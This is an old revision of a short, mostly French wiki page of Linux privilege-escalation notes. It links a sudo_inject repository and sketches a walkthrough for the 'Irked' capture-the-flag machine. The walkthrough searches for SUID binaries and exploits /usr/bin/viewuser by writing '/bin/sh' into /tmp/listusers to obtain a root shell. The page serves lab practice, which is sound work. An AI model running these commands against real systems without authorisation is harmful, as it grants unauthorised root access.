hacking-privesc-gnu-linux
This is an old revision of the document!
* https://github.com/nongiach/sudo_inject
*
Irked :
Recherche de fichiers avec SUID permissions :
find / -perm -u=s -type=f 2>/dev/null
1 fichier intéressant trouvé : /usr/bin/viewuser
Description :
So, when I run the program, I found that this application was being developed to set test user permissions but couldn’t find listusers file within /tmp. This program is, therefore, searching for data from the listusers file and the file is missing from the directory inside /tmp.
Utilisation :
echo '/bin/sh' > /tmp/listusers chmod 777 /tmp/listusers /usr/bin/viewuser
*
hacking-privesc-gnu-linux.1557244927.txt.gz · Last modified: 2019/05/07 18:02 by didzkovitchz